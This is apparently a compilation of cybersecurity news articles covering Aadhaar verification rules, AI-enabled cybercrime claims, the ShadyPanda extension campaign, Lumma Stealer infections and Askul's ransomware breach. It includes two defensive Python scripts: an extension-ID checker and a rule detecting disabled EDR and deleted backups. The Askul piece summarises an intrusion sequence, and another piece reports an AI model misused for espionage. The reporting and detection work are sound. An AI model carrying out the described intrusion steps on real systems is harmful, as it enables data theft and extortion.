In addition, the revisions mark a substantial shift in the scope of Aadhaar's deployment, extending its application to a wider range of private-sector uses under stricter regulation, beyond welfare delivery and government services. The change coincides with preparations by the Unique Identification Authority of India to launch a newly designed mobile application for Aadhaar.

According to officials, the application will be capable of supporting Aadhaar-based identification for routine scenarios like event access, registrations at hotels, deliveries, and physical access control, without having to continuously authenticate against a central database in real time.

Along with explicitly acknowledging facial authentication alongside the existing biometric and one-time password mechanisms, the updated framework strengthens the provisions governing offline Aadhaar verification, so that identity verification can be carried out in a controlled manner without a direct connection to UIDAI's systems.

As part of the revised framework, offline Aadhaar verification is also broadened beyond the limited QR code scanning that was previously used. A number of verification methods have been authorised by UIDAI as a result of this notification, including QR code-based checks, paperless offline e-KYC, Aadhaar Verifiable Credential validation, electronic authentication through Aadhaar, and paper-based offline verification. 

Additional mechanisms can be approved over time. The most significant aspect of this expansion is the introduction of the Aadhaar Verifiable Credential, a digitally signed, cryptographically secured document that contains some demographic data. Because it can be verified locally without constantly consulting UIDAI's central databases, the credential aims to reduce systemic dependency on live authentication while addressing long-standing privacy and data security concerns.

Additionally, the regulations introduce offline face verification, a system which allows a locally captured picture of the holder of an Aadhaar to be compared to the photo embedded in the credential without having to transmit biometric information over an external network. Furthermore, the amendments establish a formal regulatory framework for entities that conduct these checks, which are called Offline Verification Seeking Entities.

The UIDAI has now mandated that organizations seeking to conduct offline Aadhaar verification must register, submit detailed operational and technical disclosures, and adhere to prescribed procedural safeguards. A number of powers have been granted to the authority, including the ability to review applications, conduct inspections, obtain clarifications, and suspend or revoke access in the case of noncompliance.

In addition to clearly outlining grounds for action, the enforcement provisions also include the use of verification facilities, deviation from UIDAI standards, failure to cooperate with audits, and facilitation of identity-related abuse. A particularly notable aspect of these rules is that affected entities must be given an opportunity to present their case before punitive measures are imposed, reinforcing due process and fairness in regulation.

In the private sector, the verification process using Aadhaar is still largely unstructured at present; hotels, housing societies, and other service providers routinely collect photocopies or images of identity documents, which are then shared informally among vendors, security personnel, and front desk employees with little clarity regarding how they will retain or delete those documents. 

The new registration framework is intended to replace this fragmented system with a regulated one, in which private organizations are formally onboarded as Offline Verification Seeking Entities and are required to use UIDAI-approved verification flows in place of storing Aadhaar copies, either physically or digitally.

With regard to this transition, one of the key elements of UIDAI's upcoming mobile application will be its ability to enable selective disclosure by allowing residents to choose what information is shared for a particular reason. For example, a hotel may just receive the name and age bracket of the guest, a telecommunication provider the address of the guest, or a delivery service the name and photograph of the visitor, rather than a full identity record. 

The application will also store Aadhaar details for family members, allow biometric locks and unlocks to be performed instantly, and let demographic information be updated directly, reducing reliance on paper-based processes. As a result, control is increasingly shifting towards individuals, minimizing the exposure of their data to service providers and curbing the indefinite circulation of identity documents.

The regulatory push is part of a broader ecosystem-building effort by UIDAI. In November, the organization held a webinar, in which over 250 organizations participated, including hospitality chains, logistics companies, real estate managers, and event planners, in order to prepare for the rollout.

The outreach comes amid ongoing concerns about vulnerabilities in the Aadhaar ecosystem. According to data from the Indian Cyber Crime Coordination Centre, Aadhaar Enabled Payment System transactions are estimated to account for approximately 11 percent of cyber-enabled financial fraud in 2023.

Several states have reported instances where cloned fingerprints associated with Aadhaar have been used to siphon beneficiary funds, most often after data leaked from public records or inadequately secured computer systems. Some privacy experts warn that extending Aadhaar-based authentication into private access environments could increase systemic risk if safeguards are not developed in parallel.

Researchers from civil society organizations highlighted earlier this year that anonymized Aadhaar-linked datasets are still at risk of re-identification and that the current data protection law does not regulate anonymized data sufficiently, which could cause the new controls to break down when such data is repurposed and processed downstream.

The amendments recalibrate Aadhaar's role within India's rapidly growing digital economy, balancing greater usability with tighter governance. By formalizing offline verification, restricting the use of data through selective disclosure, and imposing clearer obligations on private actors, the revised regulations aim to curb informal practices that have long contributed to increased privacy and security risks.

The success of these measures will depend, however, largely on disciplined implementation, continued oversight by the regulatory authorities, and the willingness of industry stakeholders to abandon legacy habits of indiscriminate data collection. The transition offers advantages for service providers, who can reduce compliance risks by implementing more efficient, privacy-preserving verification methods.

Residents, for their part, gain greater control over their personal data in everyday interactions with providers. As Aadhaar moves beyond its open access environments and deeper into private settings, continued transparency from UIDAI, regular audits of verification entities, and public awareness around consent and data rights will be critical in preserving trust in Aadhaar and in ensuring that convenience doesn't come at the expense of security.

At a time when data protection expectations are higher than ever, there is much discussion about how large-scale digital identity systems can evolve responsibly; if the changes are implemented according to plan, they could serve as a blueprint for that evolution.

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing the cyber security infrastructure, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Trusted Browser Extensions Turn Rogue in ShadyPanda Malware Campaign Affecting Chrome and Edge

 

Malicious browser extensions sometimes slip into official marketplaces like the Chrome Web Store by disguising themselves as genuine tools. Detecting them becomes even harder when they behave legitimately at first, only turning harmful after users have grown to trust them.

This tactic was recently uncovered on Google Chrome and Microsoft Edge. Researchers at Koi Security discovered several extensions on both platforms that functioned normally for years before being updated with malicious code. These updates enabled attackers to monitor user activity, collect sensitive information, and secretly send that data to external servers. The operation, dubbed ShadyPanda, amassed nearly four million downloads and remains active on Edge.

Earlier this year, threat actors used a similar approach on Firefox. They first released harmless extensions designed to imitate popular cryptocurrency wallets. After gaining approval, downloads, and positive reviews, they later injected malicious functionality that logged user inputs in form fields, allowing attackers to access and steal crypto assets.

According to Koi Security, ShadyPanda originally began as an affiliate fraud scheme. Around 145 extensions posing as wallpaper and productivity tools were published across Chrome and Edge. In the initial phase, these add-ons inserted affiliate tracking codes and generated commission-based revenue through clicks to platforms like eBay, Amazon, and Booking.com. Over time, the campaign escalated to manipulating search results and eventually narrowed down to five extensions launched in 2018 that were later transformed into malware.

Some of these extensions gained significant credibility. They were labeled as Featured and Verified on Chrome, and one cache-cleaning tool called Clean Master achieved a 4.8-star rating from thousands of users. In 2024, updates to these extensions introduced malware capable of checking in hourly for commands, maintaining complete browser access, and transmitting user data back to ShadyPanda-controlled servers. These extensions have since been removed from Chrome.

In 2023, attackers also introduced five additional extensions to Microsoft Edge, including one called WeTab. Two of these functioned as full-scale spyware, and all remained active at the time of Koi Security’s report.

Because malicious extensions often masquerade as legitimate ones, simply scanning your installed add-ons may not reveal any obvious threats. Koi Security has published a list of extension IDs linked to the ShadyPanda campaign, which users should manually check.

On Chrome, users can enter chrome://extensions/ in the address bar, enable Developer mode, and view the IDs of installed extensions. These IDs can then be searched individually using the browser’s find function. If none match the listed malicious IDs, the browser is likely safe. If a match is found, the extension should be removed immediately. Edge users can follow the same steps via edge://extensions/.
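The manual ID comparison described above can also be scripted across every browser profile at once. The following is an added example, not code from Koi Security or from this post: it assumes the Chromium on-disk layout `<user data dir>/<profile>/Extensions/<extension id>/<version>/manifest.json`, and the IDs and sample tree in it are constructed placeholders, not real ShadyPanda indicators.

```python
import json
import re
import tempfile
from pathlib import Path

# Chromium extension IDs are 32 characters drawn from the letters a-p.
EXT_ID_RE = re.compile(r"^[a-p]{32}$")

# Constructed placeholder IDs, NOT real ShadyPanda indicators.
SAMPLE_ID_LIST = """\
# paste the IDs from the published list here, one per line
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   # placeholder
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb   # placeholder
"""


def load_id_list(text):
    """Parse an ID list: one ID per line, '#' starts a comment."""
    ids = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        token = line.split("#", 1)[0].strip().lower()
        if not token:
            continue
        if not EXT_ID_RE.match(token):
            raise ValueError(f"line {lineno}: not an extension ID: {token!r}")
        ids.add(token)
    return ids


def installed_extensions(user_data_dir):
    """Return one record per installed extension version in every profile."""
    records = []
    for ext_dir in sorted(Path(user_data_dir).glob("*/Extensions/*")):
        if not ext_dir.is_dir() or not EXT_ID_RE.match(ext_dir.name):
            continue  # skip anything that is not an extension ID folder
        profile = ext_dir.parent.parent.name
        for version_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
            name = "<unreadable manifest>"
            try:
                raw = (version_dir / "manifest.json").read_text(encoding="utf-8-sig")
                manifest = json.loads(raw)
                if isinstance(manifest, dict):
                    # May be a localisation key such as "__MSG_appName__".
                    name = str(manifest.get("name", "<no name>"))
            except (OSError, ValueError):
                pass  # still report the entry: matching is done on the ID
            records.append({"profile": profile, "id": ext_dir.name,
                            "version": version_dir.name, "name": name})
    return records


def find_flagged(user_data_dir, flagged_ids):
    """Installed extensions whose ID appears in the flagged set."""
    return [r for r in installed_extensions(user_data_dir)
            if r["id"] in flagged_ids]


def build_sample_tree(root):
    """Create a constructed user-data tree: three extensions, two profiles."""
    layout = [
        ("Default", "a" * 32, "2.1.0_0", {"name": "Example Cache Tool"}),
        ("Default", "c" * 32, "1.0.0_0", {"name": "__MSG_appName__"}),
        ("Profile 1", "b" * 32, "5.4_0", None),  # corrupt manifest
    ]
    for profile, ext_id, version, manifest in layout:
        vdir = Path(root) / profile / "Extensions" / ext_id / version
        vdir.mkdir(parents=True)
        text = json.dumps(manifest) if manifest is not None else "{not json"
        (vdir / "manifest.json").write_text(text, encoding="utf-8")


def demo():
    """Run the check against the constructed tree and return the matches."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return find_flagged(tmp, load_id_list(SAMPLE_ID_LIST))


if __name__ == "__main__":
    for hit in demo():
        print(f"FLAGGED {hit['id']} profile={hit['profile']!r} "
              f"version={hit['version']} name={hit['name']!r}")
```

For real use, pass the browser's own user data directory to `find_flagged` and load the published ID list in place of `SAMPLE_ID_LIST`. Extensions loaded unpacked from another folder do not appear under `Extensions/` and still need the check on the extensions page.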

This campaign highlights that even long-installed extensions can later be weaponized. Users should apply the same caution to browser add-ons as they do to mobile or desktop apps. Carefully review extension names, as fake ones often closely resemble legitimate tools. Watch for spelling errors, mismatched descriptions or images, and suspicious review patterns, such as an unusually high number of positive ratings in a short time. Conducting additional checks through online searches or community forums like Reddit can also help verify whether an extension is trustworthy.

OpenAI Warns Future AI Models Could Increase Cybersecurity Risks and Defenses

 

Meanwhile, OpenAI told the press that future generations of large language models could reach a level where they pose a serious risk to cybersecurity. In a blog post, the company admitted that powerful AI systems could eventually be used to craft sophisticated cyberattacks, such as developing previously unknown software vulnerabilities or aiding stealthy cyber-espionage operations against well-defended targets. Although this is still theoretical, OpenAI underlined that the pace at which AI cyber capabilities are improving demands proactive preparation.

The same advances that could make future models attractive for malicious use, according to the company, also offer significant opportunities to strengthen cyber defense. OpenAI said such progress in reasoning, code analysis, and automation has the potential to significantly enhance security teams' ability to identify weaknesses in systems, audit complex software, and remediate vulnerabilities more effectively. Instead of framing the issue as a threat alone, the company cast it as a dual-use challenge, one in which adequate management through safeguards and responsible deployment would be required.

In developing such advanced AI systems, OpenAI says it is investing heavily in defensive cybersecurity applications. This includes helping models improve on tasks related to secure code review, vulnerability discovery, and patch validation. It also mentioned its effort to create tooling that supports defenders in running critical workflows at scale, notably in environments where manual processes are slow or resource-intensive.

OpenAI identified several technical strategies that it thinks are critical to mitigating the cyber risk associated with the increased capabilities of AI systems: stronger access controls to restrict who has access to sensitive features, hardened infrastructure to prevent abuse, outbound data controls to reduce the risk of information leakage, and continuous monitoring to detect anomalous behavior. Together, these measures are aimed at reducing the likelihood that advanced capabilities could be leveraged for harmful purposes.

It also announced the forthcoming launch of a new program offering tiered access to additional cybersecurity-related AI capabilities. This is intended to ensure that researchers, enterprises, and security professionals working on legitimate defensive use cases have access to more advanced tooling while providing appropriate restrictions on higher-risk functionality. Specific timelines were not discussed by OpenAI, although it promised that more would be forthcoming very soon. 

Meanwhile, OpenAI also announced that it would create a Frontier Risk Council comprising renowned cybersecurity experts and industry practitioners. Its initial mandate will be to assess the cyber-related risks that come with frontier AI models, though this is expected to expand in the near future. Its members will advise on where the line should fall between developing capability responsibly and possible misuse, and their input will keep informing future safeguards and evaluation frameworks.

OpenAI also emphasized that the risks of AI-enabled cyber misuse are not confined to a single company or platform. Any sophisticated model, across the industry, it said, may be misused if there are no proper controls. To that effect, OpenAI said it continues to collaborate with peers through initiatives such as the Frontier Model Forum, sharing threat modeling insights and best practices.

By recognizing how AI capabilities could be weaponized and where the points of intervention may lie, the company believes, the industry will go a long way toward balancing innovation and security as AI systems continue to evolve.

India Witnesses Sharp Surge in Cybercrime, Fraud Dominates NCRB 2023 Report

 

The cybercrime landscape in India has worsened sharply, with NCRB data indicating that cases rose from above 52,000 in 2021 to over 86,000 by 2023, led by fraud and online financial crime. Concurrently, threat intelligence shows that India is now a high-risk ransomware and dark-web ecosystem within the Asia-Pacific region.

NCRB data and growth trend 

According to the report, NCRB’s “Crime in India” figures show an alarming and persistent increase in reported cybercrimes, from just above 52,000 cases in 2021 to beyond 86,000 cases by 2023, owing to increased digitization, online payments and use of mobile internet. This is a 31.2% year-on-year increase between 2022 and 2023 alone, and the country’s cybercrime rate has increased from 4.8 to 6.2 cases per lakh population.

Fraud is the most prevalent motive, making up almost 69% of all cybercrime incidents in 2023, followed by sexual exploitation, and extortion, highlighting that attackers mainly prey on financial and personal vulnerabilities. States such as Karnataka, Telangana and Uttar Pradesh account for a large number of cases, reflecting higher IT penetration, urbanisation and digital adoption.

Ransomware and dark-web activity

Beyond the raw NCRB figures, the report places India on an Asia-Pacific threat map, drawing upon the Cyble Monthly Threat Landscape Report for July 2025 to show that India is still among the key targets for ransomware operators. It cited the Warlock ransomware group for targeting an India-based manufacturing firm, exfiltrating HR, financial, and design data, which was then used for extortion and exposure.

The report also notes dark‑web listings advertising unauthorized access to an Indian telecom network for around US$35,000, including credentials and critical operational details, highlighting the commoditization of network breaches. Regionally, Thailand, Japan, and Singapore each recorded six ransomware victims in the observed period, with India and the Philippines close behind, and manufacturing, government, and critical infrastructure sectors bearing the brunt of attacks. 

Additionally, South Asia is experiencing ideologically driven attacks, exemplified by the pro-India Team Pelican Hackers, which claimed breaches of major Pakistani research and academic institutions. These campaigns blur the line between classic cybercrime and geopolitical conflict, indicating that Indian networks face both profit-motivated and politically motivated breaches.

Malicious Software Compromises 26000 Devices Across New Zealand


New Zealand's National Cyber Security Centre has begun notifying individuals after thousands of devices were found to be infected with malware, showing the persistent risk posed by credential-stealing cybercrime.

The agency is emailing about 26,000 people, advising them to visit the Own Your Online portal for instructions on how to remove the malicious software and strengthen their account security.

As NCSC Chief Operating Officer Michael Jagusch informed me, the alerts were related to Lumma Stealer, which is a highly regarded strain of malware targeting Windows-based devices. There is a danger that this malware can be used to facilitate identity theft or fraud by covertly harvesting sensitive data like email addresses and passwords. 

Officials noted that Lumma Stealer and other information-stealing tools are part of an international cybercrime ecosystem that continues to grow, and so users should be vigilant and take proactive security measures to protect themselves. An assessment by the National Cyber Security Centre of the Government Communications Security Bureau found that the malicious activity may have affected approximately 26,000 email addresses countrywide.

As detailed in its statement published on Wednesday, the U.S. Department of Homeland Security has warned that the malware involved in the incident, dubbed Lumma Stealer, is specifically designed to steal sensitive data, including login credentials and other personally identifiable information, from targeted systems.

As noted by the NCSC, this threat primarily targets Windows-based devices, and cybercriminals use it to facilitate fraud involving personal information as well as financial fraud. It highlights the continued exposure of everyday users to sophisticated campaigns aimed at stealing personal data.

The issue was discovered through the National Cyber Security Centre's cyber intelligence partnerships. The agency first worked with government bodies and financial institutions to alert a segment of those affected before expanding the effort to notify the public at large. NCSC Chief Operating Officer Michael Jagusch said the centre has now moved to a broader direct-contact approach, and that this is its first time undertaking public outreach of this sort on such a large scale.

He pointed out that the notifications are genuine and come from the official email address no-reply@comms.ncsc.govt.nz, which helps recipients distinguish legitimate messages from fraudulent ones. While the current campaign is targeted at households and individuals, a recent BNZ survey indicates similar exposure across small and medium businesses.

The research reveals that 65% of small and medium-sized businesses believe scam activity targeting their businesses has increased over the past year; however, 45% of these businesses do not place a high priority on scam awareness or cyber education, despite the fact that their employees routinely handle emails, payment information and customer information. 

Approximately half of surveyed SMEs reported that they had been scammed in the last 12 months, many of them after clicking links, opening attachments, or responding to misleading messages. According to BNZ fraud operations head Margaret Miller, criminals are increasingly exploiting human behavior rather than technical flaws to commit fraud, targeting business owners and employees in the course of their daily work.

A substantial number of small business owners reported losses following breaches, with consequences that reached beyond business accounts: 21% reported a business financial loss, 26% a personal financial loss and 30% a data compromise. According to Miller, the average loss was over $5,000, demonstrating that scammers attempt to steal not only company funds but also personal information and sensitive business data.

The NCSC is the country's primary authority for helping individuals and companies reduce their cyber risk, and it is housed within the Government Communications Security Bureau.

The National Cyber Security Centre offers help to individuals and organisations and is a chief authority on cyber security. It has three core functions that form the basis of its work: helping New Zealanders make informed decisions about their digital security, ensuring strong cyber hygiene is embedded within essential services and in the wider cyber ecosystem in collaboration with key stakeholders, and using its statutory mandate to combat the most serious and harmful cyber threats through the deployment of its specialist capability. 

Own Your Online, a central part of this initiative and a platform owned by the NCSC, provides practical tools, guidance and resources designed to make cybersecurity accessible for householders, small businesses, and nonprofit organizations, as well as clear advice on prevention and what to do when an incident occurs.

The incident serves as a timely reminder of the increasing sophistication and reach of modern cybercrime, as well as the shared responsibility for limiting its effects on society. Many experts continue to emphasize the importance of keeping systems secure, including using strong, unique passwords, enabling multi-factor authentication whenever possible, and keeping operating systems and software up to date.

Furthermore, users are advised to remain cautious of any unexpected emails or messages they receive, even if they appear to have come from trusted sources. Likewise, users should exclusively communicate through official channels to avoid any confusion. 

The focus remains on raising digital awareness and improving resilience among individuals and organisations, and on improving collaboration between the authorities and the business and financial sector.

Agencies have adopted a new approach built on early detection, clear communication, and practical guidance, aimed at reducing immediate harm while also fostering long-term confidence among New Zealanders in navigating an increasingly complex online world.

Askul Discloses Scope of Customer Data Theft Following October Ransomware Incident

 



Japanese e-commerce firm Askul Corporation has officially confirmed that a ransomware attack earlier this year led to the unauthorized access and theft of data belonging to nearly 740,000 individuals. The company made the disclosure after completing a detailed investigation into the cyber incident that occurred in October.

Askul operates a large-scale online platform that provides office supplies and logistics services to both corporate clients and individual consumers. The company is part of the Yahoo! Japan corporate group and plays a significant role in Japan’s business-to-business supply chain.

The cyberattack caused serious disruptions to Askul’s internal systems, resulting in an operational shutdown that forced the company to suspend product shipments. This disruption affected a wide range of customers, including major retail partners such as Muji.

Following the conclusion of its internal review, Askul clarified the categories of data that were compromised. According to the company, service-related records of approximately 590,000 business customers were accessed. Data connected to around 132,000 individual customers was also involved. In addition, information related to roughly 15,000 business partners, including outsourcing firms, agents, and suppliers, was exposed. The incident further affected personal data linked to about 2,700 executives and employees, including those from group companies.

Askul stated that it is deliberately limiting the disclosure of specific details related to the stolen data to reduce the risk of further exploitation. The company confirmed that affected customers and business partners will be informed directly through individual notifications.

Regulatory authorities have also been notified. Askul reported the data exposure to Japan’s Personal Information Protection Commission and has implemented long-term monitoring measures to identify and prevent any potential misuse of the compromised information.

System recovery remains ongoing. As of December 15, shipping operations had not fully returned to normal, and the company continues to work toward restoring all affected services.

Responsibility for the attack has been claimed by the ransomware group known as RansomHouse. The group publicly disclosed the breach at the end of October and later released portions of the stolen data in two separate leaks in November and December.

Askul shared limited technical findings regarding how the attackers gained access. The company believes the intrusion began through stolen login credentials associated with an administrator account belonging to an outsourced partner. This account did not have multi-factor authentication enabled, making it easier for attackers to exploit.

After entering the network, the attackers conducted internal reconnaissance, collected additional authentication information, and expanded their access to multiple servers. Askul reported that security defenses, including endpoint detection and response tools, were disabled during the attack. The company also noted that several ransomware variants were deployed, some of which bypassed existing detection mechanisms despite recent updates.

The attack resulted in both data encryption and widespread system failures. The ransomware was executed simultaneously across multiple servers, and backup files were deliberately erased to prevent rapid system recovery.

In response, Askul disconnected affected networks, restricted communication between data centers and logistics facilities, isolated compromised devices, and strengthened endpoint security controls. Multi-factor authentication has since been enforced across critical systems, and all administrator account passwords have been reset.
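The sequence Askul describes (an administrator login without multi-factor authentication, endpoint protection disabled on several servers, then backups erased) can be written as a correlation rule over security events. The following Python code is an added example, not Askul's or any vendor's tooling; the event schema, account names, thresholds and sample events are all constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not data from the incident). The schema
# (ts/host/account/type/mfa) is an assumed normalized log format.
EVENTS = [
    {"ts": "2025-01-10T01:02:00", "host": "vpn01", "account": "partner-admin", "type": "login", "mfa": False},
    {"ts": "2025-01-10T01:40:00", "host": "srv01", "account": "partner-admin", "type": "edr_stopped"},
    {"ts": "2025-01-10T01:41:00", "host": "srv02", "account": "partner-admin", "type": "edr_stopped"},
    {"ts": "2025-01-10T01:43:00", "host": "srv03", "account": "partner-admin", "type": "edr_stopped"},
    {"ts": "2025-01-10T01:50:00", "host": "bkp01", "account": "partner-admin", "type": "backup_deleted"},
    {"ts": "2025-01-10T09:00:00", "host": "srv07", "account": "it-ops", "type": "edr_stopped"},
    {"ts": "2025-01-10T09:05:00", "host": "vpn01", "account": "it-ops", "type": "login", "mfa": True},
]

def correlate(events, window=timedelta(hours=1), min_hosts=3):
    """Flag accounts that log in without MFA and then, inside `window`,
    stop EDR on several hosts and/or delete backups."""
    by_account = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_account.setdefault(ev["account"], []).append(ev)

    alerts = []
    for account, evs in by_account.items():
        for login in evs:
            if login["type"] != "login" or login.get("mfa"):
                continue  # only logins that skipped MFA start a chain
            start = datetime.fromisoformat(login["ts"])
            in_window = [e for e in evs
                         if start <= datetime.fromisoformat(e["ts"]) <= start + window]
            edr_hosts = sorted({e["host"] for e in in_window if e["type"] == "edr_stopped"})
            backup_hosts = sorted({e["host"] for e in in_window if e["type"] == "backup_deleted"})
            mass_edr = len(edr_hosts) >= min_hosts
            if mass_edr or backup_hosts:
                alerts.append({
                    "account": account,
                    "login_ts": login["ts"],
                    "edr_stopped_on": edr_hosts,
                    "backups_deleted_on": backup_hosts,
                    "severity": "critical" if mass_edr and backup_hosts else "high",
                })
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The single EDR stop by `it-ops` raises no alert because that account's login used MFA and the stop was isolated; tune `window` and `min_hosts` to the environment's normal maintenance patterns.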

The financial consequences of the incident have not yet been determined. Askul has postponed its earnings report to allow additional time for a comprehensive assessment of the impact.